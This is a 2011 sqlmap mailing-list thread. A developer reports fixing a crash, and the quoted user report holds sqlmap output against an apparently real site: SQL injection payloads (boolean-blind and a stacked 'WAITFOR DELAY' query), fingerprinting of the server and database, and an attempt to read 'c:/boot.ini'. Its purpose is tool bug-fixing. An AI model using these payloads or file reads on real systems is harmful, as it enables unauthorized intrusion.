Re: [sqlmap-users] mssql file read error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] mssql file read error
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-01-15 10:12:25
|
Fixed and committed. On 15 January 2011 07:01, Владимир Гопиенко <war...@gm...> wrote: > [08:59:47] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > reque > sts: > --- > Place: GET > Parameter: b2mid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE clause > Payload: id=24410 AND 7218=7218 > > Type: stacked queries > Title: Microsoft SQL Server/Sybase stacked queries > Payload: id=24410 ; WAITFOR DELAY '0:0:5';-- > --- > > [08:59:48] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2000 > [08:59:48] [INFO] fetching file: 'c:/boot.ini' > [08:59:51] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 6 times > > [08:59:51] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with > the latest development version from the Subversion repository. If the > exception > persists, please send by e-mail to sql...@li... the > comma > nd line, the following text and any information needed to reproduce the bug. > The > developers will try to reproduce the bug, fix it accordingly and get back > to yo > u. > sqlmap version: 0.9-dev (r2971) > Python version: 2.6.6 > Operating system: nt > Traceback (most recent call last): > File "sqlmap.py", line 83, in main > start() > File "C:\DSU\soft\sqlmap\lib\controller\controller.py", line 413, in start > action() > File "C:\DSU\soft\sqlmap\lib\controller\action.py", line 122, in action > conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile)) > File "C:\DSU\soft\sqlmap\plugins\generic\filesystem.py", line 266, in > readFile > > fileContent = self.stackedReadFile(rFile) > File "C:\DSU\soft\sqlmap\plugins\dbms\mssqlserver\filesystem.py", line 95, > in > stackedReadFile > if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): > NameError: global name 'PAYLOAD' is not defined > > [*] shutting down at: 08:59:51 > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
